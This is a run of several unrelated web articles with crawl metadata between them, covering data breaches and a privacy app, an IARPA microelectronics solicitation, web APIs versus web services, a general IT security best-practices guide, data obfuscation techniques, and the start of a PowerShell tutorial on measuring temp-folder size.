A data breach is a security event where highly sensitive, confidential or protected information is accessed or disclosed without permission or is lost. Organizations, governments and individuals can be victims of data breaches, and usually these events are enormously costly in terms of time, money or corporate reputation.
To give you an idea of the size and scale of some data breaches, 3.5 billion people had records exposed in the 15 biggest data breaches of this century. In just the first half of 2019, data breaches exposed 4.1 billion records.
Data breaches can occur accidentally (e.g. someone inside an organization inadvertently accesses and views information, or devices containing sensitive information are stolen or lost) or purposefully (e.g. someone inside an organization purposefully accesses and/or shares information with malicious intent, or criminals use sophisticated means such as phishing emails, brute force attacks and malware to exploit weaknesses in networks or individual behavior). Read the top 5 security concerns this year.
As of 2019, the World Economic Forum put cyberattacks in the top five risks to global stability. Worldwide, more than 80% of cyberattacks come from phishing emails, which deliver 94% of malware. In the first six months of 2019, attacks on Internet of Things devices (one of the fastest-growing emerging technologies) tripled, and malware attacks that leverage applications already installed on a system (known as fileless attacks) increased by 256%.
Often victims of data privacy breaches aren’t aware they’re a victim or they find out too late, and they don’t know the person or company violating their right to privacy. Find out how a criminal carries out a data breach and what to do if you’re caught in one.
9. Criminals can use the stolen credentials to commit crimes like credit card fraud and identity theft. The dark web is thriving.
According to Deloitte, in most cases criminals won’t use the data themselves but are either engaged by a third party to obtain the data or plan to sell the information on the dark web. Buyers from the dark web may use the data for financial theft from credit cards, to create fake passports and identities, transfer money between accounts, resell stolen information at a higher price to the media, or other illicit activities.
The COVID-19 pandemic is worsening cybercrime.
What you can do to protect your data privacy
Anonyome Labs, the makers of MySudo, believes being private doesn’t mean opting out of online services or hiding from the world. We empower people to be able to determine what information they share, and how, when, where and with whom they share it.
MySudo is the world’s only all-in-one privacy app, full of privacy and security features. Download the app and then take 90 seconds to learn how to use it. Until data privacy is better protected by the companies who collect it, the governments who access it, and the legal system, we all need proactive tools like MySudo.
IARPA wants “seedling” ideas that use a multidisciplinary approach that extends beyond traditional technological and scientific fields.
The intelligence community wants to take advantage of upcoming advances in machine learning and artificial intelligence but needs smaller, more powerful hardware to run those algorithms.
The Intelligence Advanced Research Projects Activity—the advanced research arm of the intelligence community—released a broad agency announcement in support of research into the next generation of microelectronics, including processors, semiconductors and other hardware technologies.
Researchers believe this will require a significant leap in technology and are looking for ideas from natural and social sciences, as well as art and other disciplines.
“The ability to implement AI and ML depends critically on computing models that today are limited with respect to data storage, data movement and data analysis,” the opportunity states. “Faster, more energy efficient and resilient computing requires that challenges including the physical limits on transistors, electrical interconnects, and memory elements be overcome.”
Research to date has focused on maximizing the use of existing processor chip technology. But IARPA scientists say the future will require new kinds of processors.
“To lay the foundation for long term advancements in computing technologies, a more unified approach encompassing research and development into the chemistry and physics of new materials, microelectronic devices and circuits, computing architectures and algorithm design is needed,” the notice states. “Materials scientists, chemists, and physicists, circuit designers, engineers, communications, runtime and memory architects, as well as algorithm designers and application coders must work across the historic boundaries that have separated these disciplines to achieve the next generation of highly complex systems.”
The research is in the earliest of stages, “which IARPA refers to as ‘seedlings.’”
With that in mind, the effort will be broken into two phases—A and B—with the first focused on developing initial proof-of-concept for proposals over nine months. Projects making it to Phase B will have 15 months to develop a working demo. IARPA has capped both phases at a combined total of $5 million.
Key to success will be thinking outside the traditional technological and scientific domains.
“Preference will be given to research with the ability to revolutionize hardware-software integration from material properties to hardware design, to system architecture, to software implementation,” the solicitation states. “Multidisciplinary approaches derived from life sciences, and/or inspired by artistic, anthropological, economical, and other non-traditional disciplines are welcome and encouraged.”
IARPA plans to make multiple awards for the first phase.
The effort has been divided into two topic areas for proposers to address:
Hardware, Software, Algorithm and Architecture Ecosystem
• Approaches for improving the performance of AI applications in areas such as autonomous vehicles, biometrics, communications, position-navigation-timing, remote sensing, etc.
• Research into optimizing the analytic performance of the hardware-software ecosystem in AI applications.
• Research into tools, techniques or designs to improve the reliability and integrity of microelectronics hardware and/or hardware-software systems, to include defense or hardening supply chain, fabrication and/or computation performance against adversarial, malicious or quality control vulnerabilities.
New Science, Materials and Processing
• Approaches derived from life and/or social sciences that might lead to significantly improved performance and reduced cost in the microelectronics used in AI applications.
• Emerging research materials with controlled properties that can significantly improve the performance and reduce the cost of the microelectronics used in AI applications.
• Novel approaches to the processing of the microelectronics—including fabrication, metrology and modeling—used in AI applications, which might lead to significant improvements in space, weight and power characteristics while reducing cost.
IARPA officials are accepting white papers—which are not required but “strongly encouraged”—by May 17. Based on those submissions, “formal proposals will then be encouraged or not encouraged,” the solicitation states, with the final deadline for proposal submission set for June 30.
“Proposals must explicitly address relevance of the technical approach to the future potential of Artificial Intelligence in the United States,” the solicitation states. “Proposals shall demonstrate that the proposed effort has the potential to make revolutionary, rather than incremental, improvements to current capabilities.”
Questions on the opportunity are due by 4 p.m. May 19. | <urn:uuid:e8528f3d-6a38-4396-8593-7ef5c68825c9> | CC-MAIN-2022-40 | https://www.nextgov.com/emerging-tech/2021/05/intel-community-needs-next-gen-microelectronics-future-ai/173766/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335444.58/warc/CC-MAIN-20220930051717-20220930081717-00766.warc.gz | en | 0.915185 | 930 | 2.75 | 3 |
The terms web API and web service are often used interchangeably, so let’s distinguish between the two.
Web APIs are an evolution of web services.
Both facilitate information transfer; however, web APIs are more dynamic than web services.
What is an API?
An API specifies how software components should interact with each other. It is a set of protocols and routines, with responses generally returned as JSON or XML data. APIs can use any type of communication protocol and are not limited in the same way a web service is.
What is a web service?
A web service is any piece of software that makes itself available over the internet and uses a standardized XML messaging system. XML is used to encode all communications to a web service.
How are they different and related?
By definition, a web service is any piece of software that makes itself available over the Internet and standardizes its communication via XML encoding. In contrast, a typical Web API specifies how software components should interact with each other using the web’s protocol (HTTP) as the go-between.
Now let’s discuss their similarities. Web APIs and web services have things in common: both serve as a means of communication between consumers and providers. Both support XML-based data payloads, though JSON is the more common payload type for web APIs. Last but not least, both are essentially a means to an end, and the same problems can be solved by either. Both can also be configured to operate over a network or within a machine.
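The payload difference can be seen side by side. The two responses below are made-up examples of what a provider might return for the same resource, one in the JSON style typical of web APIs and one in the XML style typical of web services; both parse with Python's standard library alone.

```python
import json
import xml.etree.ElementTree as ET

api_response = '{"user": {"id": 42, "name": "Ada"}}'           # typical web API payload (JSON)
service_response = "<user><id>42</id><name>Ada</name></user>"  # typical web service payload (XML)

user = json.loads(api_response)["user"]
print(user["name"])  # Ada

root = ET.fromstring(service_response)
print(root.findtext("name"))  # Ada
```

Either format carries the same information; the choice is a matter of the contract the provider publishes.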
About Incepta Solutions
At Incepta Solutions, our team of #InceptaInnovators is passionate about developing the bridge between people and operations, as we create stories that we can all be proud of.
Since our inception in 2010, we have been recognized as trusted experts in providing digital services to global businesses. We are proud to be named one of the top 5 Information Technology companies in Canada on the Growth List 2020 (published by Canadian Business and Maclean’s). In addition, we are humbled to be a certified Great Place to Work – Canada.
Our full suite of technology services includes:
Integration | Digital Transformation | Cybersecurity
Data Management | Cloud Strategy | Customer 360
At Incepta Solutions, we provide business solutions that solve challenges and enable future growth and success for our clients. We leverage industry-leading technologies to provide innovative solutions that are robust, of premier quality, and cost-effective.
In our growth journey, our goal is to become a global leader in digital transformation and enterprise solutions. We enable businesses all over the world to solve complex and critical integration challenges. As #InceptaInnovators, we hope to look back at these times on how we have helped global brands and enterprises achieve success. Our driving force is that one day, we are able to reflect on our shared journey and be proud of the stories we have created together. | <urn:uuid:e121ed8d-4a4e-4d6a-87f5-e25276655c0a> | CC-MAIN-2022-40 | https://www2.inceptasolutions.com/2021/06/16/difference-between-web-apis-and-web-services/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030336674.94/warc/CC-MAIN-20221001132802-20221001162802-00766.warc.gz | en | 0.929922 | 606 | 2.84375 | 3 |
Confidentiality is about protecting sensitive and private information from unauthorized access. Integrity relates to protecting data from deletion or modification by unauthorized persons. Availability refers to ensuring that authorized users can reliably access company data and systems whenever they need them. Together, these three principles are known as the CIA triad.
Information Security relates to the different tools and processes your company uses specifically to protect any critical or sensitive business information.
Cybersecurity deals explicitly with protecting your business’s sensitive and critical data from cybercriminals. Although their malicious attempts usually occur over the internet, these attacks can also happen face-to-face.
Many companies believe that because they aren’t a large tech company or a sensitive government organization, they’re unlikely targets of a cyberattack. In reality, the potential cyber threats to your company are real and prevalent. Just because your business is small or doesn’t produce something you consider “high-value” doesn’t mean you’re safe.
Keep in mind that many cyberattacks, like phishing and malware, aren’t necessarily targeted. Instead, hackers send out mass emails or infect websites, knowing someone, somewhere will click the wrong link and infect their computer. We’ll go into greater detail on this point later in this article. Businesses that store large amounts of sensitive data would do well to ensure they follow best practices, as security breaches could result in highly costly business losses and legal penalties.
But even if such an outcome were not the case, to ignore the possibility of malicious attacks is to ignore the risk of your day-to-day operations abruptly shutting down for an unknown period of time. There’s also a risk that your internal and external business communications might be disrupted if your cloud applications’ security, or even your social media accounts, are compromised. Such breaches, especially those that divulge your users’ private information, could lead to significant reputational damage, loss of data, and an inevitable hit to your bottom line.
IT Security Threats
There are several significant threats to your business’s network security. If your company is to counter them, it’s important to understand these threats and how they work.
Weak Security Policies
If an unauthorized person wanted to access your network, a weak security policy would be the easiest vulnerability to exploit.
Unlocked or easily unlocked devices make for easy targets for this kind of threat, and even unsophisticated hackers can take advantage of weak company passwords. Organizations that fall prey to these threats generally have no password change policies, don’t require automatic device locking after inactivity, or have poor access control policies.
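A minimal sketch of how an IT team might enforce a password policy at account creation. The length threshold and the specific rules are illustrative, not a standard; adjust them to your own policy.

```python
import re

MIN_LENGTH = 12  # illustrative threshold

def password_issues(password: str) -> list[str]:
    """Return a list of policy violations; an empty list means the password passes."""
    issues = []
    if len(password) < MIN_LENGTH:
        issues.append(f"shorter than {MIN_LENGTH} characters")
    if not re.search(r"[A-Z]", password):
        issues.append("no uppercase letter")
    if not re.search(r"[a-z]", password):
        issues.append("no lowercase letter")
    if not re.search(r"[0-9]", password):
        issues.append("no digit")
    if not re.search(r"[^A-Za-z0-9]", password):
        issues.append("no special character")
    return issues

print(password_issues("hunter2"))
# ['shorter than 12 characters', 'no uppercase letter', 'no special character']
print(password_issues("Corr3ct-Horse-Battery!"))  # []
```

Complexity rules like these are only one layer; pairing them with rotation policies and automatic device locking covers the weaknesses described above.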
Web Browser Extensions
Although most appear to be benign, some web browser extensions have been compromised by cybercriminals in their attempt to gain access to the sensitive data of users, including web history, cookies, and even saved passwords.
As convenient as public wifi is, it comes with its concerns.
Public wifi networks are a common avenue for Man-in-the-Middle cyberattacks, which allow hackers to intercept the data flowing through the public wifi connection. This is primarily a concern for employees who work remotely, as these workers often use cafes and other public locations for free wifi.
Phishing attacks are a form of social engineering that occurs when a cybercriminal attempts to trick you or your employees into giving up your private information via email, phone, in person, and now even through SMS communication. They accomplish this by posing as a legitimate brand or person that asks for your private information.
Malware is among the most popular and common threats to your business’s network. Defined simply, malware is malicious software, programs, or files deliberately placed on your network.
They go by many names, including trojan horses, viruses, spyware, etc. You may also encounter malware in the form of a Backdoor Attack, which refers to any method authorized or unauthorized users use to bypass standard security measures to gain access to your company’s network, software applications, or computer systems.
Ransomware is a type of malware that, once downloaded, immediately encrypts and prevents you from accessing your company’s systems and data until you pay a ransom.
Most come via suspicious emails that trick you into clicking nefarious links or downloading malware disguised as a regular attachment. You can also encounter them on questionable sites. Failing to properly update your browser, operating system, or installed software may also leave your business vulnerable to ransomware attacks. Remember that even after payment, there is no guarantee that the criminal will give you access to your captured data.
Unfortunately, the biggest security threat to your business is probably your employees.
For instance, the victims of phishing attacks are typically employees who were duped into clicking a suspicious link in an email. Of course, security breaches caused by employees are not always accidental. Sometimes employees are given a greater level of access to your company’s systems than necessary, which enables them to abuse their access privileges for personal gain. The simplest way to mitigate this issue is to set intelligent policies regarding employee data privileges and routinely educate your workforce on avoiding phishing attacks.
Unpatched Software & Hardware Vulnerabilities
As technology changes and ages, hackers eventually learn how to bypass old hardware and software security measures.
Because there are so many cybercriminals looking to exploit outdated security systems, one of the riskiest things your company can do is dismiss the updates that pop up on your business devices and applications. Although it may be tempting to postpone an update to save an extra 5-10 minutes of your workday, doing so puts your company’s security at risk.
The best way to counter this risk is to maintain regular update schedules and have your IT team ensure that the latest security patches are being applied to company systems.
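The patch-tracking part of that process can be sketched as a simple inventory check. The package names and version numbers below are made up; the idea is to compare what is installed against the minimum versions your patch policy requires.

```python
def parse(version: str) -> tuple[int, ...]:
    """Turn '3.0.13' into (3, 0, 13) so versions compare numerically."""
    return tuple(int(part) for part in version.split("."))

# Hypothetical policy and inventory:
required = {"openssl": "3.0.13", "nginx": "1.24.0"}
installed = {"openssl": "3.0.2", "nginx": "1.24.0"}

outdated = {
    name: (have, need)
    for name, need in required.items()
    if (have := installed.get(name)) and parse(have) < parse(need)
}
print(outdated)  # {'openssl': ('3.0.2', '3.0.13')}
```

Numeric comparison matters: naive string comparison would rank "3.0.2" above "3.0.13".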
What Are the Types of IT Security?
You should generally be concerned with seven types: network, data, internet, endpoint, cloud, application, and physical security.
Keep in mind that as networks and systems continue to integrate with the cloud and other emerging technologies, new threats to your security will likely emerge alongside them.
Network security relates to protecting the interaction of your company’s network and your devices through the use of a firewall–ideally a next-generation firewall.
This would protect your network from unauthorized access, unexpected malfunctions, misuse, destruction, modification, and improper disclosure of information.
Data security relates to protecting the actual files, data, and databases that house your company information.
Commonly used data security practices include encryption, tokenization, hashing, and key management.
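A brief sketch of the hashing practice named above, using only Python's standard library. The password and record contents are made-up examples; the iteration count is illustrative and should follow current guidance in a real deployment.

```python
import hashlib
import hmac
import os

# One-way hashing: store a salted hash of a password, never the password itself.
salt = os.urandom(16)
pw_hash = hashlib.pbkdf2_hmac("sha256", b"s3cret-pa55", salt, 100_000)

def verify(password: bytes) -> bool:
    candidate = hashlib.pbkdf2_hmac("sha256", password, salt, 100_000)
    return hmac.compare_digest(candidate, pw_hash)  # constant-time comparison

print(verify(b"s3cret-pa55"))  # True
print(verify(b"wrong-guess"))  # False

# Integrity checking: any modification to a record changes its digest.
record = b"account=1234;balance=100"
digest = hashlib.sha256(record).hexdigest()
tampered = b"account=1234;balance=999"
print(hashlib.sha256(tampered).hexdigest() == digest)  # False
```

Hashing is one-way by design; encryption (reversible with a key) and tokenization serve the complementary cases where the original value must be recoverable.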
Internet security is about making sure that any access to the internet is protected in both directions, outbound and inbound.
The purpose of this is to block access to malicious sites and keep other nefarious web entities from gaining entry to the network.
Internet security measures can be established inside the network or outside the network to accommodate employees that are roaming, traveling, or simply working remotely.
A simple example is when your employees use a VPN at a coffee shop instead of the publicly available wifi.
Endpoint security relates to protecting the endpoint devices at your company workstations, although it can also include the security of mobile devices.
This type of security stops your company devices from being accessible to malicious networks that might compromise your business data’s safety.
Anti-virus software and device management software are standard practices of endpoint security.
Cloud security relates to protecting your company applications, data, and identities on the public cloud, which are not covered by your on-premise security stack.
Best practices involve using a cloud access security broker (CASB), a secure internet gateway (SIG), and cloud-based unified threat management (UTM) as a way of limiting who has access to your company's cloud networks.
Application security refers to protecting applications that your company is running, whether they be on-premise or in the cloud.
Application security makes sure that the data inside your company applications is secure and not open to unauthorized personnel.
The goal of application security is to limit access to your applications to relevant personnel. Even then, making sure that said person only has access to what they need, no more, no less.
Physical security involves setting up proper measures so that both employees and non-employees cannot steal company data, devices, hard drives, servers, etc.
Ensuring that server rooms are locked, giving only authorized personal keycards, and having a security watch for intruders goes a long way toward providing that company data doesn’t unexpectedly leave the premises.
Protecting Your Organization From IT Security Threats
Remote Work Policies
Make sure your company implements and educates your employees on remote work policies.
These include but are not limited to:
- Avoid public wifi-networks or encrypting your web connection.
- Make sure not to conduct work on personal computers.
- Remember to check that no one can see your screen if working with sensitive data.
- As an extra precautionary measure, using a USB data blocker when charging at public phone charging stations is often found at malls.
Data redundancy technically relates more to business continuity and disaster recovery (BCDR). However, it’s still relevant to address here as a response to specific incidents, particularly those relating to ransomware attacks.
In these situations, the criminal has control of your data, and there’s no guarantee you’ll be getting it back–but if your company implements data redundancy and has a backup or copy of the stolen data, you won’t need to worry so much about the ransom.
The next step would be to find out how you were compromised and patch the hole so that the incident doesn’t happen again.
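A minimal sketch of a verified backup step, using only Python's standard library. The file names are made up; the point is that hashing the copy and comparing it to the source catches a silently corrupted (or already-encrypted) backup before you need to rely on it.

```python
import hashlib
import shutil
import tempfile
from pathlib import Path

def sha256_of(path: Path) -> str:
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()

def backup(source: Path, backup_dir: Path) -> Path:
    backup_dir.mkdir(parents=True, exist_ok=True)
    dest = backup_dir / source.name
    shutil.copy2(source, dest)
    if sha256_of(dest) != sha256_of(source):  # verify the copy byte-for-byte
        raise IOError(f"backup of {source} failed verification")
    return dest

# Example usage with scratch files in a temporary directory:
with tempfile.TemporaryDirectory() as tmp:
    src = Path(tmp) / "customers.db"
    src.write_bytes(b"example records")
    copy = backup(src, Path(tmp) / "backups")
    print(sha256_of(copy) == sha256_of(src))  # True
```

Real redundancy plans also keep copies off-site or offline, so that ransomware encrypting the primary network cannot reach the backups.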
Internet & Hardware Security
As mentioned earlier in the article, having your remote or off-premise employees use a VPN to connect to your business network is an excellent way to reinforce your business’s internet security.
For hardware security, remember to keep all company devices password-protected and set them to lock after a set period of inactivity.
To keep unauthorized users from bypassing your password protection, make sure to enable two-step verification.
Keep Up with Updates
Keeping relevant software applications updated ensures that they run without issue and that their security is up to date. Older applications are more susceptible to hacking.
Audit Your IT Security
Creating and implementing regular audits is the best way to track which strategies and practices are working and which need to either be improved or removed from your policies. The audits help you assess your company’s level of risk in a measurable way.
IT Security Policy Best Practices
Having policies that are too specific can end up needlessly restrictive, while creating policies that are too broad may not be secure enough; the secret is finding the right balance that fits your unique company’s needs.
Policies that restrict the sharing of passwords both inside and outside your organization, group policies in the IT department related to server access, and similar protocols are all things to keep in mind when developing or reviewing your policies.
The main thing to keep in mind with policies is to require that all employees comply with your stated rules and guidelines.
Business managers typically achieve this by setting up acceptable use policies (AUPs), which stipulate the constraints and practices employees must agree to in order to interact with your business’s network or the internet.
Safeguard Your Business’s Future by Protecting Your Networks
Having your entire business on the internet makes it more easily accessible and scalable. Still, it also runs the risk of a hacker breaching your security and gaining access to critical information.
IT Security is what keeps your business safe as it continues to adapt to the modern era. To ensure that your own business stays prepared for potential threats, keep the lessons and best practices covered here in mind.
- What is IT Security? – the set of cybersecurity strategies your company uses to prevent unauthorized access to sensitive data and/or critical resources, including data, devices, and networks.
- Cybersecurity vs. IT Security vs. Information Security – IT Security relates to the security of your business’s data via computer network security. Information security refers to the different tools and processes used to protect any critical or private business info. Cybersecurity deals with safeguarding sensitive business data from cyberattacks.
- Why is IT Security Important? – Cyberattacks and security breaches occur all the time, and most attacks are random, meaning that all businesses, even smaller mom and pop shops, are at risk. A breach of your private data can lead to reputational damage, financial loss, and disruption to business operations.
- IT Security Threats – weak security policies, compromised web browser extensions, unsecured public wifi, phishing attacks, ransomware, malware, and employees who accidentally or purposefully compromise your network security.
- Types of IT Security – network security, data security, internet security, endpoint security, cloud security, application security, and physical security.
- IT Security Best Practices – the use of remote work policies, applying data redundancy to mitigate damage in the event of a ransomware incident, implementing internet and hardware security, keeping up with software and application updates, auditing, and having a specific and manageable set of policies.
Maintaining Your Business’s IT Security
With everything that needs to be done, from the security audits to policy implementation, it can feel like one too many things to deal with on top of standard business operations.
Spend less time worrying about your security and more time running your business by taking advantage of our Managed Security Services, which come with preventative IT Security measures on top of our advanced threat detection and remediation solutions. | <urn:uuid:73ae09b3-d4aa-414c-ad7d-fcae4b13f1e3> | CC-MAIN-2022-40 | https://blog.commprise.com/en/understanding-it-security | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337360.41/warc/CC-MAIN-20221002212623-20221003002623-00766.warc.gz | en | 0.926719 | 2,860 | 2.953125 | 3 |
As data use has become ubiquitous in recent years, data breaches have followed suit. In 2021, the Identity Theft Resource Center recorded more than 1,800 instances of compromised data, a 68% increase over 2020 and 23% rise from the previous all-time high. By October of 2021, the total number of data breaches exceeded all of 2020, and the people affected by those breaches in the third quarter alone outnumbered the first two quarters combined.
The bottom line is that collecting, storing, and using data inherently introduces the risk of that data being compromised. To avoid damage to an organization’s reputation, trustworthiness, and revenue, many are turning to data obfuscation to preserve data privacy and security.
In this blog, we look at what data obfuscation is, the benefits of using it, the most common techniques, and the capabilities data owners should look for when selecting a data obfuscation tool.
What Is Data Obfuscation?
Data obfuscation is the process of scrambling data to obscure its meaning, providing an added layer of protection against threats and malicious actors. By hiding the data’s actual value, data obfuscation renders it useless to attackers while retaining its utility for data teams, particularly in non-production environments.
For developers using potentially sensitive customer or company data to build and test applications in non-production environments, the ability to access quality data is critical. However, these non-production environments often do not have sufficient security perimeters or access controls in place – leaving data vulnerable to attack. Data obfuscation allows developers and testers to access realistic data, but since it no longer contains personally identifiable information (PII), they can do so without the concern of it being exploited.
The Benefits of Data Obfuscation
As noted above, one of the top benefits of data obfuscation is its ability to secure non-production environments and minimize risks when building new applications and programs. This is powerful for organizations looking to gain a competitive edge with innovative new technologies or product features.
Another primary benefit of obfuscating data is that it enables secure data sharing. In today’s global marketplace and increasingly connected world, sharing data both internally and externally is a key business driver, and has been linked to increased stakeholder engagement and enterprise value. The ability to obscure sensitive data makes it easier to securely share across lines of business or with third parties without risking unauthorized access.
Now more than ever, data sharing and data use more broadly must be compliant with an ever-growing list of regulatory requirements, data use agreements, and internal company rules. The EU’s General Data Protection Regulation (GDPR), for example, is quite strict about the use of personal data. Data obfuscation helps organizations overcome that potential hurdle by altering PII, thereby mitigating their risk of incurring fines or of any real damage should a breach occur.
Data obfuscation also enables self-service data access by allowing data teams to develop, test, analyze, and report on data, without having to jump through hoops to get the data needed to do so. This makes data supply chains more efficient by reducing the burden on IT and data engineering teams to manually respond to every data access request. Organizations can be confident that self-service data use doesn’t come at the expense of customers’, employees’, or users’ data privacy.
Data Obfuscation Techniques
With this foundational understanding of data obfuscation and its benefits, let’s look at three of the main techniques used to obfuscate data: data masking, data encryption, and data tokenization. Here, it’s worth pointing out that while encryption and tokenization are reversible (the original values can be derived from the obfuscated data), data masking is not.
Data masking is a data security measure that involves creating a fake but highly convincing version of an organization’s secure data. The idea is to protect data from breaches or leaks in instances where functional data sets are needed for demonstration, training, or testing, without revealing actual user data.
Essentially, data masking uses the same format as existing databases, but changes the data’s values. This process is done in such a way that the data cannot be reverse-engineered to reveal the original data points. Numbers and characters may be scrambled, hidden, substituted, or even encrypted.
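A minimal sketch of format-preserving masking (Python, with hypothetical helper names): each letter or digit is swapped for a random character of the same class, so a masked phone number still looks like a phone number but cannot be traced back to the original value.

```python
import random
import string

def mask_value(value: str, rng=None) -> str:
    """Replace each letter/digit with a random character of the same
    class, preserving length, case, and punctuation (e.g. the dashes
    in a phone number) so the masked value still 'looks real'."""
    rng = rng or random.SystemRandom()
    out = []
    for ch in value:
        if ch.isdigit():
            out.append(rng.choice(string.digits))
        elif ch.isalpha() and ch.isupper():
            out.append(rng.choice(string.ascii_uppercase))
        elif ch.isalpha():
            out.append(rng.choice(string.ascii_lowercase))
        else:
            out.append(ch)  # keep formatting characters as-is
    return "".join(out)

def mask_record(record: dict, sensitive_fields: set) -> dict:
    """Return a copy of `record` with only the listed fields masked."""
    return {k: mask_value(v) if k in sensitive_fields else v
            for k, v in record.items()}
```

Because the replacements are random and the original is never stored alongside the mask, there is no path back from the masked value, which is exactly the irreversibility property described above.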
Encryption can be thought of as a form of secret code, which scrambles the relevant information in a set of data and can only be reversed by assigned parties who possess the necessary key. In asymmetric encryption, a public key encrypts the data and a corresponding private key decrypts it, while in symmetric encryption a single private key handles both encryption and decryption. Either way, the data can’t be manipulated, analyzed, or used in any way until it’s decrypted.
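To make the symmetric case concrete, here is a deliberately simplified sketch in Python: the same shared key both encrypts and decrypts. The hash-based keystream is for illustration only; production systems should use a vetted cipher such as AES-GCM from an audited cryptography library.

```python
import hashlib

def _keystream(key: bytes, length: int) -> bytes:
    """Derive a pseudo-random keystream by hashing the key with a
    running counter (illustration only -- not a production cipher)."""
    stream = b""
    counter = 0
    while len(stream) < length:
        stream += hashlib.sha256(key + counter.to_bytes(8, "big")).digest()
        counter += 1
    return stream[:length]

def xor_cipher(data: bytes, key: bytes) -> bytes:
    """Symmetric transform: applying it once encrypts, applying it
    again with the same key decrypts, mirroring the single
    private-key scheme described above."""
    ks = _keystream(key, len(data))
    return bytes(a ^ b for a, b in zip(data, ks))
```

Note how decryption is just a second call with the same key; without that key, the ciphertext is unusable, which is the property that makes encryption a form of obfuscation.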
Tokenization is a specific form of data masking where the replacement value, also called a “token,” has no extrinsic meaning to an attacker. Key segregation means that the key used to generate the token is separated from the pseudonymized data through process firewalls. The token is a new value that is meaningless in other contexts. Importantly, it’s not feasible for an attacker to make inferences about the original data from analysis of the token value.
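The token/vault split can be sketched as follows (hypothetical class, Python): tokens are random values with no mathematical relationship to the original data, and the token-to-value mapping lives only in a separate store, standing in for the segregated key/vault described above.

```python
import secrets

class TokenVault:
    """Minimal tokenization sketch: sensitive values are swapped for
    random tokens, and only the vault can map a token back."""

    def __init__(self):
        self._vault = {}   # token -> original value (kept segregated)
        self._issued = {}  # value -> token (reuse one token per value)

    def tokenize(self, value: str) -> str:
        if value in self._issued:
            return self._issued[value]
        # The token is random, so it is meaningless outside the vault.
        token = "tok_" + secrets.token_hex(16)
        self._vault[token] = value
        self._issued[value] = token
        return token

    def detokenize(self, token: str) -> str:
        return self._vault[token]
```

An attacker who obtains only the tokenized dataset learns nothing about the originals; reversal requires access to the separately protected vault.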
Other Data Obfuscation Techniques
While the techniques cited above are the most common, others exist as well. Nulling, for example, replaces part of the data with null-valued variables, while blurring offsets the values of certain data by a predetermined amount. Meanwhile, as the name implies, randomization involves randomly reordering characters and numbers.
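These three techniques can each be sketched in a few lines (hypothetical helper names, Python): nulling drops a value entirely, blurring shifts a number by a bounded random offset, and randomization shuffles a string's characters.

```python
import random

def null_field(record: dict, field: str) -> dict:
    """Nulling: replace a field's value with None."""
    return {**record, field: None}

def blur_field(record: dict, field: str, offset_range: int, rng=None) -> dict:
    """Blurring: offset a numeric value by a bounded random amount."""
    rng = rng or random.Random()
    offset = rng.randint(-offset_range, offset_range)
    return {**record, field: record[field] + offset}

def randomize_field(record: dict, field: str, rng=None) -> dict:
    """Randomization: randomly reorder the characters of a value."""
    rng = rng or random.Random()
    chars = list(record[field])
    rng.shuffle(chars)
    return {**record, field: "".join(chars)}
```

Each helper returns a new record rather than mutating the original, so the obfuscated copy can be handed to a non-production environment while the source data stays untouched.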
What to Look for in a Data Obfuscation Tool
When looking for the right tool to help you obfuscate your organization’s data, there are several factors to consider. Chief among them is whether or not the tool you’re considering has the right capabilities. Specifically, you’ll be best served with a tool that enables:
Sensitive Data Discovery and Classification
The best data obfuscation tools automatically scan cloud data sources, detect sensitive data, and generate standard tagging across multiple compute platforms. With sensitive data discovery, you can eliminate manual, error-prone processes and get universal data access control and visibility into your most sensitive data.
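A toy version of such a scan might look like this (Python; the two patterns and labels are illustrative assumptions, since real discovery tools ship many more detectors plus validation logic such as Luhn checks):

```python
import re

# Hypothetical detectors for two common PII types.
PII_PATTERNS = {
    "email": re.compile(r"[\w.+-]+@[\w-]+\.[\w.-]+"),
    "ssn": re.compile(r"\b\d{3}-\d{2}-\d{4}\b"),
}

def classify_columns(rows: list) -> dict:
    """Scan a list of row dicts and tag each column with the PII
    types detected anywhere in its values."""
    tags = {}
    for row in rows:
        for col, val in row.items():
            for label, pattern in PII_PATTERNS.items():
                if isinstance(val, str) and pattern.search(val):
                    tags.setdefault(col, set()).add(label)
    return tags
```

The resulting tags are what a policy engine would then consume, e.g. "mask every column tagged `ssn` before it reaches a non-production environment."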
Attribute-Based Access Control
You’ll also want to ensure that your data obfuscation tool empowers your data teams to create automated policies to govern cloud data use. Dynamic attribute-based access control will allow you to scale user adoption, eliminate approval bottlenecks, and build trust with compliance and governance teams.
Being able to automate the data obfuscation techniques mentioned above is also important. Dynamic data masking and anonymization with mathematical guarantees can accelerate data sharing use cases, as well as enable data engineers and operations teams to automate data access control across your entire cloud data infrastructure at scale.
Data Policy Auditing
Finally, make sure that any data obfuscation tool you choose captures data policy enforcement in rich audit logs so that it’s easy for your data teams to keep track of data security compliance laws and regulations. This is critical for ensuring that obfuscation is working as intended, and can identify any suspicious activity immediately.
Immuta empowers data engineering and operations teams to automate data security, access control, and privacy protection. Our industry-leading automated data access solution offers data obfuscation capabilities to help any organization ensure its data use is secure, compliant with the latest regulatory requirements, and self-service for maximum efficiency.
To see how Immuta can simplify data masking and access control, start a free trial. | <urn:uuid:4b27a58e-6507-4aeb-b157-8fe2c40b42b8> | CC-MAIN-2022-40 | https://www.immuta.com/blog/data-obfuscation/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337360.41/warc/CC-MAIN-20221002212623-20221003002623-00766.warc.gz | en | 0.896592 | 1,580 | 2.90625 | 3 |
Client VPN Authentication Protocol
The Client VPN uses PAP as the authentication method. PAP authentication is always transmitted inside an IPsec tunnel between the client device and the MX security appliance using strong encryption. User credentials are never transmitted in clear text over the WAN or the LAN. An attacker sniffing on the network will never see user credentials because PAP is the inner-authentication mechanism used inside the encrypted IPsec tunnel.
Let's put what you've learned so far into practice using PowerShell's pipeline with objects.
- By Jeffery Hicks
We've covered a lot in the last few weeks, so now it's time to put some of what you've been learning to work in a relatively practical example. How about we try to figure out how much space files in %TEMP% are consuming?
First, you need to figure out what directory %TEMP% refers to. You can use the variable environmental PSDrive to return the directory by using $env:temp. Once you have that, a directory listing is the first step:
PS C:\> dir $env:temp -recurse
This lists the files and subfolders. The next step is to add up all of the file sizes. In other shells and languages, this may have meant parsing the directory output or keeping a running total going as each file was processed.
